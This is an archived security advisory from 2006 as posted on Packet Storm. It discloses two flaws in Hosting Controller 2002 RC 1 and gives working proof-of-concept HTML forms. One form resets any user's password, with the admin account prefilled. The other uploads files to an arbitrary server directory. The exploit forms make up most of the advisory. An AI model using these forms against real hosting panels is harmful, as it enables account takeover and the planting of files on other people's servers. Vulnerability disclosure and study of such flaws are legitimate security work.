what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

HostingController.txt

HostingController.txt
Posted Apr 4, 2006
Authored by Paolo Di Febbo

2 vulnerabilities in Hosting Controller allow remote authenticated users to change every user password or upload files in every directory.

tags | exploit, remote, vulnerability
SHA-256 | 94ba0a237df21bf6b4d45a0d0376b17453e5d93f93cbdfcbc22696bf830d76f8

HostingController.txt

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hello,
i've found 2 vulnerabilities in Hosting Controller that allows remote
authenticated users to change every user password or upload files in every
directory. Here are the PoC:

This allows to modify passwords:
<form
action="http://[URL]/admin/accounts/AccountActions.asp?ActionType=UpdateUser
"
method="post">
Username: <input name="UserName" value="hcadmin"
type="text" size="50">
<br>
Name: <input name="FullName" value="g|25|h"
type="text" size="50">
<br>
ChangePass (type true): <input type="checkbox" name="PassCheck"
value="TRUE">
<br>
Password: <input name="Pass1" title="Password">
<br>
Confirm: <input name="ConfPass" title="Password">
<br>
<input name="submit" value="submit" type="submit">

</form>
<br>
PS: You should have authenticated access.<br>
<br>
- -------------------------<br>
Vulnerable versions:<br>
- - HC 2002 RC 1<br>
Other versions may be vulnerable


And this allows to upload:
<form method="POST" action="http://[URL]/admin/folders/saveuploadfiles.asp"
enctype="multipart/form-data">
Where upload files: <input name="OpenPath" value="E:\webspace\test">
<br>
File 1: <input type="file" name="file1" value><br>
File 2: <input type="file" name="file2" value><br>
File 3: <input type="file" name="file3" value><br>
File 4: <input type="file" name="file4" value><br>
<input type="submit" value="Upload Files" name="upload"><br>
<br><br>
PS: If you see an error message, it's not important. You just should have
authenticated access.
</form>
<br>

- -------------------------<br>
Vulnerable versions:<br>
- - HC 2002 RC 1<br>
Other versions may be vulnerable

This vulns are tested with HC 2002 RC 1, but other versions may be
vulnerable.


Sorry for my english, but i'm Italian.

-----BEGIN PGP SIGNATURE-----
Version: 6.5.8ckt http://www.ipgpp.com/

iQA/AwUBRC/pBBMZt0KZeGPOEQK5lwCg13JhLH6ghgWoO8zUSG5EUZpmwtwAmwdh
KUkiwb7H3FkEdfZcORRpl4LH
=qlwF
-----END PGP SIGNATURE-----
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close